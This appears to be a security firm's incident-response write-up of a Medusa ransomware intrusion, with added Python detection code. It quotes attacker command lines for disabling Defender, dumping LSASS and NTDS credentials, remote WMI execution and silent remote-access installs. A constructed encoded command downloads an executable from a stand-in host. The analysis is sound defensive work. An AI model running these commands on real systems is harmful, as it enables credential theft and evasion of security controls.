Don’t throw a hissy fit; defend against Medusa

Intro

Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTPs) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.

In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into Medusa.

Not to be confused with MedusaLocker, Medusa was first observed in 2021 and is a Ransomware-as-a-Service (RaaS) that often uses the double extortion method for monetary gain. In 2023 the group’s activity increased with the launch of the ‘Medusa Blog’, a platform used to leak data belonging to victims.

Summary

This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa ransomware.

Below is a summary of the findings presented in this blog post:

  • Use of web shells to maintain access.
  • Utilising PowerShell to conduct malicious activity.
  • Dumping password hashes.
  • Disabling antivirus services.
  • Use of Windows utilities for discovery activities.
  • Reverse tunnel for C2.
  • Data exfiltration.
  • Deployment of Medusa ransomware.

Medusa

Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of double-extortion ransomware, where the threat actor both exfiltrates and encrypts data. The threat actor threatens to release or sell the victim’s data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware can be characterised as financially motivated. Victims of Medusa ransomware come from no particular industry, suggesting the group behind this variant has no issue with harming any organisation.

Incident Overview  事件概述

Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.  

Timeline

T – Initial Access gained via web shells.

T+13 days – Execution activity.

T+16 days – Persistence activity.

T+164 days – Defense Evasion activity.

T+172 days – Persistence and Discovery activity.

T+237 days – Defense Evasion and Credential Access activity started.

T+271 days – Ransomware executed.

MITRE TTPs

Initial Access

The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.

Execution

PowerShell was leveraged by the threat actor to conduct various malicious activities such as:

  • Downloading executables
    • Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc …
  • Disabling Microsoft Defender
    • Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
  • Deleting executables
    • Example: powershell.exe -noninteractive -exec bypass del C:\PRogramdata\re.exe
  • Conducting discovery activity
    • Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain

Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> /user:<DOMAIN\USER> /password:<REDACTED> process call create 'cmd.exe'.

Scheduled tasks were used to execute c:\programdata\a.bat. It is not known exactly what a.bat was used for; however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi:

  • powershell Invoke-WebRequest -Uri hxxp://download.anydesk[.]com/AnyDesk.msi -OutFile anydesk.msi
  • msiExec.exe /i anydesk.msi /qn

A cmd.exe process was started with the following argument list: c:\programdata\a.bat';start-sleep 15;ps AnyDeskMSI

Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.

Persistence

Maintaining access to the victim’s network was achieved by creating a new user, ‘admin’, on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless; however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>.

Defence Evasion

The range of defence evasion techniques used shows that evading detection was one of this threat actor’s aims. Antivirus agents were removed from all affected hosts, including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;

Additionally, LAdHW.sys, a signed kernel-mode driver, was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command & {Remove-NetFirewallRule -DisplayName "<Antivirus Agent Firewall Rule Name>"}

The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted that many of these executables, such as JAVA64.exe and re.exe, were deleted after use. Additionally, Sophos.exe (see below), which was packed with Themida, was executed.

Figure 1 – Sophos.exe.

The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities.

Credential Access

The following credential dumping techniques were utilised by the threat actor:

  • Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.
  • Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable.
  • An LSASS memory dump was created using the built-in Windows tool comsvcs.dll:
    • powershell -exec bypass -c "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full
  • The built-in Windows tool ntdsutil.exe was used to extract the NTDS:
    • powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\programdata\nt' q q
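Detection logic for the command lines quoted in the Execution, Defence Evasion and Credential Access sections, added here as an example; it is not NCC Group’s code or tooling. The sample events, host names, regexes and the hypothetical download URL are constructed; the technique ids follow the mapping table at the end of this post, and the -enc handling shows why an encoded command must be unpacked before pattern matching.

```python
import base64
import re
def encode_ps(ps):
    # Build a -enc argument the way PowerShell expects it: UTF-16LE text, then Base64.
    return base64.b64encode(ps.encode("utf-16le")).decode()

# Constructed sample process-creation records (hypothetical 4688-style events) modelled on
# the command lines quoted in this post; none of this is telemetry from the engagement.
SAMPLE_EVENTS = [
    {"host": "WEB01", "cmd": "powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;"
     "New-ItemProperty -Path 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender' "
     "-Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;"},
    {"host": "WEB01", "cmd": "powershell -exec bypass -c \"rundll32.exe C:\\windows\\System32\\comsvcs.dll, "
     "MiniDump ((ps lsass).id) C:\\programdata\\test.png full\""},
    {"host": "DC01", "cmd": "powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\programdata\\nt' q q"},
    {"host": "WEB02", "cmd": "reg add HKLM\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest "
     "/v UseLogonCredential /t REG_DWORD /d 1 /f"},
    {"host": "WEB02", "cmd": "powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc "
     + encode_ps("Invoke-WebRequest -Uri http://example.invalid/re.exe -OutFile C:\\programdata\\re.exe")},
    {"host": "APP01", "cmd": "powershell.exe -Command Get-Date"},  # benign control
]

# (rule name, technique id from the mapping table in this post, pattern)
RULES = [
    ("Defender real-time monitoring disabled", "T1562.001",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("Defender DisableAntiSpyware policy set", "T1562.001",
     re.compile(r"Windows Defender.{0,40}DisableAntiSpyware.{0,20}-Value\s+1", re.I)),
    ("LSASS dump via comsvcs.dll MiniDump", "T1003.001", re.compile(r"comsvcs\.dll\s*,\s*MiniDump", re.I)),
    ("NTDS extraction via ntdsutil ifm", "T1003.003", re.compile(r"ntdsutil.*\bac\s+i\s+ntds\b.*\bifm\b", re.I)),
    ("WDigest UseLogonCredential set to 1", "T1112",
     re.compile(r"WDigest.{0,40}UseLogonCredential.{0,30}\b1\b", re.I)),
    ("Firewall rule removed", "T1562.004", re.compile(r"Remove-NetFirewallRule", re.I)),
    ("Download via Invoke-WebRequest", "T1105", re.compile(r"Invoke-WebRequest|\biwr\b", re.I)),
]
ENC_RE = re.compile(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
def decode_encoded_command(cmd):
    """Return the decoded -enc payload (Base64 of UTF-16LE) if present, else None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan(events):
    """Match each command line, plus any decoded -enc payload, against RULES.
    Returns one (host, rule name, technique id) tuple per match."""
    hits = []
    for ev in events:
        texts = [ev["cmd"]]
        decoded = decode_encoded_command(ev["cmd"])
        if decoded is not None:
            texts.append(decoded)
            hits.append((ev["host"], "Base64-encoded PowerShell command", "T1027"))
        for text in texts:
            hits.extend((ev["host"], name, tid) for name, tid, rx in RULES if rx.search(text))
    return hits
```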

Discovery

The threat actor conducted the following discovery activity:

| Type of discovery activity | Description |
| --- | --- |
| nltest /trusted_domains | Enumerates domain trusts |
| net group 'domain admins' /domain | Enumerates domain groups |
| net group 'domain computers' /domain | Enumerates domain controllers |
| ipconfig /all | Learn about network configuration and settings |
| tasklist | Displays a list of currently running processes on a computer |
| quser | Show currently logged on users |
| whoami | Establish which user they were running as |
| wmic os get name | Gathers the name of the operating system |
| wmic os get osarchitecture | Establishes the operating system architecture |
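The commands above are individually ordinary on an administrator’s host; what stands out is several of them from one account within minutes. The Python below is an added example, not NCC Group’s tooling: it groups constructed process-creation records per host and user and alerts when a short window covers several distinct discovery techniques. Sample events, host names, the 10-minute window and the threshold of 3 are assumptions to tune per estate.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands from the table above, keyed by the technique ids used in this post's mapping.
DISCOVERY_PATTERNS = {
    "T1482": re.compile(r"\bnltest\b.*trusted_domains", re.I),
    "T1069.002": re.compile(r"\bnet\s+group\b.*domain admins", re.I),
    "T1018": re.compile(r"\bnet\s+group\b.*domain computers", re.I),
    "T1016": re.compile(r"\bipconfig\b", re.I),
    "T1007": re.compile(r"\btasklist\b", re.I),
    "T1033": re.compile(r"\b(?:quser|whoami)\b", re.I),
    "T1082": re.compile(r"\bwmic\s+os\s+get\b", re.I),
}

# Constructed sample records (timestamp, host, user, command line); not telemetry from the engagement.
SAMPLE_EVENTS = [
    ("2023-01-10 09:00:05", "WEB01", "admin", "whoami"),
    ("2023-01-10 09:00:41", "WEB01", "admin", "nltest /trusted_domains"),
    ("2023-01-10 09:01:12", "WEB01", "admin", "net group 'domain admins' /domain"),
    ("2023-01-10 09:01:30", "WEB01", "admin", "net group 'domain computers' /domain"),
    ("2023-01-10 09:02:02", "WEB01", "admin", "ipconfig /all"),
    ("2023-01-10 09:02:15", "WEB01", "admin", "wmic os get osarchitecture"),
    ("2023-01-10 11:30:00", "APP01", "svc_mon", "tasklist"),       # routine, isolated
    ("2023-01-10 15:45:00", "APP01", "svc_mon", "ipconfig /all"),  # hours later: no burst
]

def classify(cmd):
    """Return the discovery technique ids a command line matches (usually zero or one)."""
    return [tid for tid, rx in DISCOVERY_PATTERNS.items() if rx.search(cmd)]

def find_bursts(events, window_minutes=10, min_techniques=3):
    """Per (host, user), slide a window over the discovery commands and alert when the
    commands inside it cover at least min_techniques distinct technique ids.
    Returns {(host, user): sorted technique ids} for each actor that trips the rule."""
    per_actor = defaultdict(list)
    for ts, host, user, cmd in events:
        for tid in classify(cmd):
            per_actor[(host, user)].append((datetime.fromisoformat(ts), tid))
    window = timedelta(minutes=window_minutes)
    alerts = {}
    for actor, seen in per_actor.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            tids = {tid for t, tid in seen[i:] if t - start <= window}
            if len(tids) >= min_techniques:
                alerts[actor] = sorted(tids)
                break
    return alerts
```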

Lateral Movement

Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network.

Command and Control

A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic, as can be seen in this case, where port 80 was used.

Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.
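A check for the reverse tunnel pattern described above, combined with the indicators from the IoC table at the end of this post, as an added example (not NCC Group’s tooling). Connection records, the browser allowlist, the staging-directory pattern and the non-C2 addresses are constructed assumptions; it also shows refanging the defanged indicators before matching.

```python
import re

# Indicators from this post's IoC table, written defanged exactly as published.
DEFANGED_IOCS = ["134.195.88[.]27:80", "webhook[.]site", "bashupload[.]com", "tmpfiles[.]org"]

def refang(indicator):
    """Turn a defanged indicator back into its literal form for matching."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")

def parse_ioc(ioc):
    """Return (host, port) from a refanged indicator; port is None when not specified."""
    host, sep, port = refang(ioc).rpartition(":")
    return (host, int(port)) if sep and port.isdigit() else (refang(ioc), None)

IOC_SET = {parse_ioc(i) for i in DEFANGED_IOCS}

# Assumed allowlist of browsers and the user-writable staging directories seen in this case.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
STAGING_DIRS = re.compile(r"^c:\\(?:programdata|users\\[^\\]+\\appdata\\local\\temp)\\", re.I)

def assess(conn):
    """conn: {"image", "dst", "dport"} in the shape of a Sysmon Event ID 3 record.
    Returns the reasons this connection deserves attention (empty list if none)."""
    reasons = []
    image = conn["image"].lower()
    exe = image.rsplit("\\", 1)[-1]
    dst, dport = conn["dst"].lower(), conn["dport"]
    if (dst, dport) in IOC_SET or (dst, None) in IOC_SET:
        reasons.append(f"matches published indicator {dst}:{dport}")
    # The reverse tunnel here used port 80 from C:\programdata; a non-browser making
    # web-port connections from a staging directory is the generic version of that.
    if dport in (80, 443) and STAGING_DIRS.search(image) and exe not in BROWSERS:
        reasons.append(f"web-port connection from staging directory by {exe}")
    return reasons

# Constructed sample connections (not real telemetry); addresses other than the
# published C2 are documentation ranges.
SAMPLE_CONNECTIONS = [
    {"image": "C:\\ProgramData\\re.exe", "dst": "134.195.88.27", "dport": 80},
    {"image": "C:\\Users\\admin\\AppData\\Local\\Temp\\2\\upd.exe", "dst": "198.51.100.9", "dport": 443},
    {"image": "C:\\ProgramData\\JAVA64.exe", "dst": "bashupload.com", "dport": 443},
    {"image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "dst": "198.51.100.9", "dport": 443},
    {"image": "C:\\Windows\\System32\\svchost.exe", "dst": "10.0.0.5", "dport": 135},
]

def triage(conns=SAMPLE_CONNECTIONS):
    """Return only the connections that raised at least one reason, with their reasons."""
    return [(c["image"], assess(c)) for c in conns if assess(c)]
```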

Exfiltration

Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.

Impact

The Medusa ransomware, in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.

Indicators of Compromise

| IOC Value | Indicator Type | Description |
| --- | --- | --- |
| webhook[.]site | Domain | Malicious webhook |
| bashupload[.]com | Domain | Download JAVA64.exe and RW.exe |
| tmpfiles[.]org | Domain | Download re.exe |
| 134.195.88[.]27:80 | IP:PORT | C2 |
| 8e8db098c4feb81d196b8a7bf87bb8175ad389ada34112052fedce572bf96fd6 | SHA256 | trust.exe (Mimikatz.exe) |
| 3e7529764b9ac38177f4ad1257b9cd56bc3d2708d6f04d74ea5052f6c12167f2 | SHA256 | JAVA_V01.exe |
| f6ddd6350741c49acee0f7b87bff7d3da231832cb79ae7a1c7aa7f1bc473ac30 | SHA256 | testy.exe / gmer_th.exe |
| 63187dac3ad7f565aaeb172172ed383dd08e14a814357d696133c7824dcc4594 | SHA256 | JAVA_V02.exe |
| 781cf944dc71955096cc8103cc678c56b2547a4fe763f9833a848b89bf8443c6 | SHA256 | Sophos.exe |
| C:\Users\Sophos.exe | File Path | Sophos.exe |
| C:\Users\admin\Desktop\ | File Path | trust.exe, JAVA_V01.exe, testy.exe, gmer_th.exe, JAVA_V02.exe |
| C:\ProgramData\JWrapper-Remote Access\ | File Path | JWrapper files |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH> | File Path | GhostWebshell compiled files |
| C:\Windows\PSEXESVC.exe | File Path | PsExec |
| | File Path | Disables AV |
| | File Path | PDQDeployRunner – used to deploy LAdHW.sys |
| C:\Users\<USER>\AppData\Local\Temp\2\gaze.exe, C:\Windows\System32\gaze.exe | File Path | Ransomware executable |


| Tactic | Technique | ID | Description |
| --- | --- | --- | --- |
| Initial Access | Exploit Public-Facing Application | T1190 | A vulnerable application hosted by an external facing web server was exploited. |
| Execution | Windows Management Instrumentation | T1047 | WMI was used to remotely execute a cmd.exe process. |
| Execution | Scheduled Task/Job: Scheduled Task | T1053.005 | Execute a.bat |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell was leveraged to execute malicious commands. |
| Execution | Software Deployment Tools | T1072 | PDQ Deploy was installed to deploy LAdHW.sys. |
| Execution | System Services: Service Execution | T1569.002 | PsExec was installed as a service. |
| Persistence | Create Account: Domain Account | T1136.0012 | A new user ‘admin’ was created to maintain access. |
| Persistence | Server Software Component: Web Shell | T1505.003 | Web shells were utilised to maintain access. |
| Defense Evasion | Obfuscated Files or Information: Software Packing | T1027.002 | Sophos.exe was packed with Themida. |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Malicious executables were deleted after use. |
| Defense Evasion | Indicator Removal: Clear Persistence | T1070.009 | Malicious executables were deleted after use. |
| Defense Evasion | Obfuscated Files or Information | T1027 | Base64 encoded PowerShell commands were utilised to download malicious executables. |
| Defense Evasion | Modify Registry | T1112 | The WDigest registry key was modified to enable credential dumping activity. |
| Defense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 | Antivirus services were disabled. |
| Defense Evasion | Impair Defenses: Disable or Modify System Firewall | T1562.004 | Firewall rules were deleted. |
| Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 | Mimikatz was utilised. An LSASS memory dump was created. |
| Credential Access | OS Credential Dumping: NTDS | T1003.003 | Ntdsutil.exe was used to extract the NTDS. |
| Discovery | Domain Trust Discovery | T1482 | Nltest was used to enumerate domain trusts. |
| Discovery | Permission Groups Discovery: Domain Groups | T1069.002 | Net was used to enumerate domain groups. |
| Discovery | System Network Configuration Discovery | T1016 | Ipconfig was used to learn about network configurations. |
| Discovery | System Service Discovery | T1007 | Tasklist was used to display running processes. |
| Discovery | Remote System Discovery | T1018 | Net was used to enumerate domain controllers. |
| Discovery | System Owner/User Discovery | T1033 | Quser was used to show logged in users. Whoami was used to establish which user the threat actor was running as. |
| Discovery | System Information Discovery | T1082 | Wmic was used to gather the name of the operating system and its architecture. |
| Lateral Movement | Remote Services: Remote Desktop Protocol | T1021.001 | RDP was used to laterally move through the environment. |
| Command and Control | Ingress Tool Transfer | T1105 | PowerShell commands were used to download and execute malicious files. |
| Command and Control | Remote Access Software | T1219 | JWrapper and AnyDesk were leveraged. |
| Command and Control | Protocol Tunnelling | T1572 | A reverse tunnel was established. |
| Exfiltration | Exfiltration | TA0010 | Data was exfiltrated and published to the leak site. |
| Impact | Data Encrypted for Impact | T1486 | Medusa ransomware was deployed. |
| Impact | Inhibit System Recovery | T1490 | VMs from the Hyper-V storage and local and cloud backups were deleted. |

References

Originally published by Molly Dewis: Don’t throw a hissy fit; defend against Medusa

Copyright notice: posted by admin on 15 November 2023 at 12:00 am.